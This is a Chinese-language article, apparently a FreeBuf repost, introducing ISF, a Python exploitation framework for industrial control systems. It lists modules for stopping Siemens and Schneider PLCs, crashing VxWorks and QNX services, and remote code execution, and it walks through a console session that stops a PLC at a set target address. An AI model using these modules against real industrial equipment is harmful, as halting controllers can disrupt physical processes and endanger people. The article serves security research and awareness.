python工业控制_ISF：一款基于Python的工控系统漏洞利用框架

今天给大家介绍一款名叫ISF的工具，它是一款针对工业控制系统的漏洞利用框架。该工具基于开源项目routersploit，采用Python语言开发，它跟MetaSploit框架有些相似，希望大家能够喜欢。

ICS（工业控制系统）协议客户端名称 路径 Descriptionmodbus_tcp_client icssploit/clients/modbus_tcp_client.py Modbus-TCP客户端

wdb2_client icssploit/clients/wdb2_client.py WdbRPC Version 2客户端(Vxworks 6.x)

s7_client icssploit/clients/s7_client.py s7comm客户端(S7 300/400 PLC)

漏洞利用模块Name Path Descriptions7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control.py S7-300/400 PLC启动/停止

vxworks_rpc_dos exploits/plcs/vxworks/vxworks_rpc_dos.py Vxworks RPC远程DoS（CVE-2015-7599）

quantum_140_plc_control exploits/plcs/schneider/quantum_140_plc_control.py Schneider Quantum 140系列PLC启动/停止

crash_qnx_inetd_tcp_service exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py Crash QNX Inetd TCP服务

qconn_remote_exec exploits/plcs/qnx/qconn_remote_exec.py QNX QCONN远程代码执行

扫描器模块Name Path Descriptionprofinet-dcp-scan scanners/profinet-dcp-scan.py Profinet DCP扫描器

vxworks_6_scan scanners/vxworks_6_scan.py Vxworks 6.x扫描器

s7comm_scan scanners/s7comm_scan.py S7comm扫描器

ICS协议模块（采用Scapy编写）

这些协议模块能够与其他的模糊测试框架（例如Kitty）进行整合，或者你也可以将其用于开发属于你自己的客户端工具。Name Path Descriptionpn_dcp icssploit/protocols/pn_dcp Profinet DCP Protocol

modbus_tcp icssploit/protocols/modbus_tcp Modbus TCP Protocol

wdbrpc2 icssploit/protocols/wdbrpc2 WDB RPC Version 2 Protocol

s7comm icssploit/protocols/s7comm.py S7comm Protocol

框架安装

Python依赖环境gnureadline(OSX only)

requests

paramiko

beautifulsoup4

pysnmp

python-nmap

scapy

在Kali Linux中安装

安装命令如下所示：git clone https://github.com/dark-lbp/isf/

cd isf

python isf.py

工具使用root@kali:~/Desktop/temp/isf#python isf.py

_____ _____  _____ _____ _____  _     ____ _____ _______

|_  _/ ____|/ ____/ ____|  __ \||    / __ \_   _|__  __|

| || |   | (___| (___ | |__) | |   | |  | || |   | |

| || |     \___ \\___ \|  ___/| |  | |  | || |    | |

_| || |____ ____) |___) | |    | |___| |__| || |_   | |

|_____\_____|_____/_____/|_|    |______\____/_____|  |_|

ICS Exploitation Framework

Note    : ICSSPOLIT is fork from routersploit at

https://github.com/reverse-shell/routersploit

Dev Team : wenzhe zhu(dark-lbp)

Version : 0.1.0

Exploits: 2 Scanners: 0 Creds: 13

ICS Exploits:

PLC: 2          ICS Switch: 0

Software: 0

isf >

漏洞利用isf> use exploits/plcs/

exploits/plcs/siemens/  exploits/plcs/vxworks/

isf> use exploits/plcs/siemens/s7_300_400_plc_control

exploits/plcs/siemens/s7_300_400_plc_control

isf> use exploits/plcs/siemens/s7_300_400_plc_control

isf(S7-300/400 PLC Control) >

注意事项：用户可使用Tab键实现命令补全。

选项

显示模块选项：isf(S7-300/400 PLC Control) > show options

Targetoptions:

Name      Current settings     Description

----      ----------------     -----------

target                          Target address e.g.192.168.1.1

port      102                  Target Port

Moduleoptions:

Name       Current settings     Description

----       ----------------     -----------

slot       2                    CPU slotnumber.

command    1                    Command0:start plc, 1:stop plc.

isf(S7-300/400 PLC Control) >

设置选项：isf(S7-300/400 PLC Control) > set target 192.168.70.210

[+]{'target': '192.168.70.210'}

执行模块：isf(S7-300/400 PLC Control) > run

[*]Running module...

[+]Target is alive

[*]Sending packet to target

[*]Stop plc

isf(S7-300/400 PLC Control) >

显示模块信息：isf(S7-300/400 PLC Control) > show info

Name:

S7-300/400PLC Control

Description:

UseS7comm command to start/stop plc.

Devices:

-  Siemens S7-300 and S7-400 programmable logiccontrollers (PLCs)

Authors:

-  wenzhe zhu

References:

isf(S7-300/400 PLC Control) >

工具文档

* 参考来源：lastline，FB小编Alpha_h4ck编译，转载请注明来自FreeBuf.COM